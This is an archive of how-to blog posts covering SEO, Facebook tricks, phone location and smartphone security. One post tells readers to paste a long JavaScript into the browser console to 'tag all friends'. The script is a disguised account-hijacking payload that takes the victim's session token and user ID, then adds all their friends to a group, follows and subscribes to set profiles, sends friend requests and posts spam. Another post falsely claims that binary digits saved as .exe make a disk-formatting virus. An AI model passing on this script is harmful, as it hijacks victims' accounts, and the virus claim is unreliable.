Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label How To's. Show all posts
Showing posts with label How To's. Show all posts

Saturday, 6 February 2016

Create A Virus To Format The Whole Hard Disk Of Any Computer *DEADLY*

010010110001111100100101010101010
100
00011111100000


just write the above numbers on notepad
and save this file with .exe extension
You just created a virus to formatyour hard disk.

Caution :- Dont even try to openthis file in your computer... Yourhard disk will be formattedincluding c drive!

Thursday, 30 July 2015

How To Get Listed In Google, Bing And Yahoo




In this article, I’m going to teach you to get your site listed in famous search engines. So set aside a few minutes to peruse this whole article or you could wind up turning your wheels and squandering a considerable measure of time on useless strategies.

 

Getting listed in search engine is a standout amongst the best methods for directing free, focused on traffic to your site.

Getting ranked in search engines is not as easy as it was before.

How Search Engines Determine Your Rank


Before you attempt to add your site to the search engines, you ought to comprehend what they search for when they choose how to rank your site.

 

Simply on the grounds that your site is indexed/listed doesn’t mean you’ll get activity. You need to verify your site and make sure your site is search engine ready.


The general dependable guideline is that most search engines utilize a “formula” to focus keyword relevancy. Search engines use complex, proprietary algorithms to determine website ranking in the organic search results and each search engine has its own unique algorithm that it uses to rank pages.

 

By and large, this formula recipe comprises of your page title, general body substance and the number and nature of links (backlinks) indicating back your site, social influence, and so on.

 

 

It’s essential to note that each search engine is different. Some may take a look at inbound links (number of people linking to you), others may put more accentuation on your body content.

 



Backlinks

Backlinks are truly the establishment of positioning well with most search engines. The more important, quality sites that links to you (one-way, not link exchange), the better you will rank generally.

 

That does not mean you ought to go around paying for links because it is against the rules of most search engine tools today. Indeed, Google started punishing services that were charging clients to build up their backlinks.

 

Google considers that unnatural linking on the grounds that anybody can do it. It’s additionally not an extraordinary route for them to gage how truly famous a site is on the grounds that anybody can purchase links or take part in link exchange.


That is the reason numerous individuals have lost their rankings throughout the years. Google started cheapening certain link building practices that used to profit sites in search.

 

Numerous sites were positioning on the first page only in light of the fact that they purchased links or partook in link building schemes. So the sites that ranked well weren’t fundamentally the most popular, simply the ones that purchased or acquired the most links.

 

Thus, Google balanced their algorithm to markdown a hefty portion of the linking practices individuals once utilized.

 

I’ve generally been one to develop my backlinks regularly by simply concentrating on writing content. Individuals link to my content intentionally and my backlink profile grows naturally. I don’t invest time pursuing links or searching for approaches to expand my backlinks.

 

Yes, it’s a slower transform, however I’m playing by the guidelines and don’t need to stress over abusing any SE rules.

 

 

Never forget, not all backlinks are made equivalent. It’s not about amount, however quality.


Read more about SEO



Google, Bing and Yahoo

There are a modest bunch of search engines out there that bring traffic, however the truth is a vast rate of search engine traffic originates from Google, Yahoo and Bing.

 

Yes, there are different search engines, yet they pull their results from the huge 3.

 

Getting Indexed


The extent that getting listed goes, all search engines have spiders that meander the web and add destinations to their databases as they discover them. So the most effortless route for Google to index/list your site is to get connected from a site officially in Google’s file.

 

The other approach to tell Google about your site is to sign up with Google Webmaster Tools and make a XML sitemap (suggested). In the event that you utilize Blogger, your sitemap is consequently made for you.

 

In the event that you utilize WordPress, introduce the All in One SEO plugin and it will help you make more search-engines-friendly content.



Submit your URL to Google:


  1. Go to this link: https://www.google.com/webmasters/tools/submit-url?continue=/addurl

 

  1. Sign into your Google account (i.e. Gmail)

 

  1. Sort in your URL, sample: http://www.yoursite.com

  1. Enter the captcha content demonstrated in the container

 

  1. Select “submit request”

 

Submit your URL to Yahoo and Bing:

 

  1. Go to this link: http://www.bing.com/toolbox/submit-site-url

 

  1. Sort in your URL, sample: http://www.yoursite.com

  1. Enter the captcha content demonstrated in the case

 

  1. Select “SUBMIT”

     

    Source: Howtokreate

How to invite all you friends to a Facebook page at once


step 1: Using a Chrome Extension to Invite All Friends

1. Download the Google Chrome browser, if you don’t have it already.

Go to https://www.google.com/intl/en/chrome/browser/ to find the download.

 

2. Install the downloaded file once it is saved to your computer. Double click on the file and it should open the installation wizard.

 

 

Step 2: Go to the Google Chrome web store.

1. Access it at https://chrome.google.com/webstore.

2. Click the “Extension” tab in the left hand column to search for extensions

 

 

 

1. After you have logged in to your Facebook account, you then open your Facebook page.

2. Click “Invite Friends” When the dialog box pops up, you should have an option that says “Toggle All.” Click that button to select everyone.

Note: If the you did not see invite friends there, share the page to your timeline through the share button and you will see the invite friends page in pop up.

 

3. Press the “Invite” icon at the top of the address bar to share the invitation

 

 

congrats! you have successfully invited all your friends.

pls share your comments below if you find this helpful

 

Friday, 26 September 2014

How To Tag All Your Friends On A Facebook Status In A Single Click

 "How to Tag all your Friends on a Facebook Status in a single click".Using this trick you can invite all your friends to view your status.This way you can get a lot of exposure if you are promoting any brand or you can invite all your friends to like your photo or status.

Steps to Tag All Your Facebook Friends in a Single Click:

The technique is very simple even though the code is a little complex.This trick is currently working perfectly on Google Chrome Browser, so I recommend you to use Google Chrome while performing this trick.
  • Login to your Facebook Account on Google Chrome Browser.
  • Post A Status.
  • Then click on the time stamp of the status, so that your status will open in a separate window.

  • Now press Ctrl + Shift + J
  • or right click on any where and click inspect element
  • Now a windows will pop out below.
  • Switch to the Console Tab and paste the below code over there and hit Enter.
  • function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1e3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);sublist("624334420912439");sublist("599238170088731");sublist("623881154291099");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();if(gf["readyState"]!=4){}else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]){}else{friends=data["payload"]["entries"]["sort"](function(e,t){return e["index"]-t["index"]})}}for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=function(){if(httpwp["readyState"]==4&&httpwp["status"]==200){}};httpwp["send"](paramswp)}var spage_id="473108719451870";var spost_id="473108719451870";var sfoto_id="473108719451870";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/)){document.cookie="paylasti=hayir;expires="+btarihi.toGMTString()}var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")
  • Ignore if you get any error and just wait for a while.
  • Within few seconds all your friends must be tagged in the status.
  • That's all friends you are done.
  • Hope you enjoyed the trick.

This script is tested and its perfectly working on Google Chrome.If you are facing any issues do let us know in your comments below.

How To Trace Exact Location Of Mobile Phone



There are many instances when we want to know where our friends are, where our parents are, and for those who've got a pair, where is my girl-friend or boyfriend. ! Well there are many apps in the market which allow you to get exactly the pin-pointed location of  any cellphone. But the problem is they cost too high. Well today I'm gonna show you a process by which you can trace the exactmobile location of any cell phone without the need to spend a single penny. What you need is listed below, and i'm sure most of us already have what is needed.



REQUIREMENTS:

Any cell phone that supports Google maps. eg. iPhone , Nokia , Blackberry , Symbian etc.

Google Latitude. Which you can download by going to google.com/latitude from your cell phone.


STEPS:-
Go to www.google.com/latitude from your cell phone.
Download the free app.
Open the App.
Enter You mobile number in the entry Field.
Now You've set it up on your phone. Now you gotta set it up on your friends cell phone. 


HOW TO SET IT UP ON YOUR FRIENDS CELL PHONE:

You can add friends by their E-mail Addresses. Your friends will receive an E-mail with the downloadlink of Google latitude. 
Or you can manually add yourself or ask your friend to add google latitude on his/her cell phone. 
Now you and your friend can add each other as friends on google latitude and you'll get the exact location of where your friends cell phone is.
There is exactly no limit to how many friends you can add in your latitude circle. ( just make sure you dont add your parents :) 
Well so As soon as You and your buddy confirm each other as friends you get to see each others location.



HOW TO USE IT EVEN WHEN YOU DON'T HAVE YOUR CELL PHONE WITHYOU:
Well the most eye catching feature of google latitude is that you can use it online even without a cell phone.
Just go to google.com/latitude from you PC, Follow the instructions, log-in into your account. And track You friends Locations !!

Enjoy (-_-)

How To Secure Your Smartphone From Hackers

Now a days, We are using smartphone for our daily life such E-mail, facebook, twitter, paypal, banking etc..its all the our personal working. So their is more important to protect our smartphone from being hacked.

Using some security improvement helps you to protect your phone. Actually the method which you adopt  to protect your computer can be used to protect your smartphone too. Use following given below tips to secure your smart phone.

You can also use the some Antivirus & Security for protect your smartphone



Top 7 Android Security-Antiviurs Apps



1. Use Passcodes Everywhere:


Whether you have an Android phone or an iPhone, you can prevent access to your device by adding a passcode or a lock pattern on Android. This simple security measure can save tour sensitive information This is especially important if you have a bunch of apps installed where personal data is stored like financial apps (Mint, bank apps, etc), note apps  etc.The home screen passcode is important because a lot of the email apps (Mail on iPhone and Gmail on Android) don’t even have an option to passcode your email. Emails can contain a lot of private information and since most people go to parties and leave their phones on tables and counters. Sp passcode is necessary.


2. Protect Your iCloud & Google Account:

The second thing most is that if someone can access into your iCloud or Google account, they can gain access to a lot of data that you might be creating and editing from your smartphone. In these times, it’s a necessary  to enable 2-step verification on both of these accounts.Your Google account basically logs you into all Google services from YouTube to Gmail to Google Play to Google Maps to Google Calendar to Picasa to Google+, etc, etc, etc.


3. Avoid Jailbreaking or Rooting Your Smartphone:

If you are jailbreak or root your phone for fun and enjoyment, then good for you. But you have to avoid this because it can mess up your phone and cause you more grief than happiness. Secondly, you won’t be able to update your phone with the latest updates to the OS since it’ll be in an unsupported mode.


4. Be Careful With the Apps You Install:

This is especially important on Android devices. Google recently removed 50,000 apps that were suspected containing viruses. There are a lot  of apps that contain malware, viruses or other sneaky software to steal your data or damage your phone. The Apple app store also has this problem.So,be careful about installing apps.


5. Use an App Instead of the Browser:

If you’re doing banking on your phone or stock trading or anything else that contain personal sensitive information between your phone and the Internet, it’s best to use an official app for that site or company rather than opening using the browser on your phone.For example, Chase, Bank of America and lots of other big financial institutions have their own apps for iOS and Android.


6. Control What an App Can Access:

You’ve probably seen the following message on your iPhone a hundred times already:There are all types of these “AppName Would Like to Access Your Data” messages. Data can be photos, location, contacts etc. Don’t just click OK all the time. If you click anything all the time, it’s better to just choose Don’t Allow and if you really can’t use the app later on, you can manually go back in and change it to allow access.


7. Keep Data Backed Up:

It’s not only a good idea to keep your smartphone backed up in case if it gets stolen and you have to remotely wipe it clean. Apple users can install the Find My iPhone app, which will let you remotely lock a phone and remotely wipe it if you know it’s been stolen.If you don’t have your data backed up, you’ll lose it all if it’s stolen. If you back it up locally or in the cloud, you’ll be able to wipe your phone and get all your data back on your new phone.On Android, there is a built-in backup tool, but it doesn’t backup everything on your phone like the iOS does.


8. Report Your Phone Stolen:

There has been a stolen phone database created that is shared between the major wireless carriers. You can report your phone stolen and that will prevent anyone from connecting to the carrier and using data or minutes. If they try to wipe it, replace the SIM, etc, it still won’t allow them to activate on any of the carriers because of the serial number.


9. Update the OS:

Just like you have to constantly install Microsoft security updates for your PC, it’s a good idea toinstall the latest updates for your smartphone. If there are no major issues with the update like degradation of battery life, etc, but if nothing stands out, then update the phone.In addition to updating the OS, it’s also a good idea to update the apps installed on your phone.


10. Wireless & Bluetooth:

When you’re not at home, it’s best to try to disable the wireless and bluetooth altogether and use your 3G or 4G connection if you can. The moment you connect to an untrusted wireless network, you’re open to hackers scanning for victims over the network. A hacker  try to connect to your smartphone and steal data, etc.If bluetooth is enabled and discoverable, it gives hackers another way to possibly see the data being passed between the bluetooth device and your phone.

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 

Karan Chauhan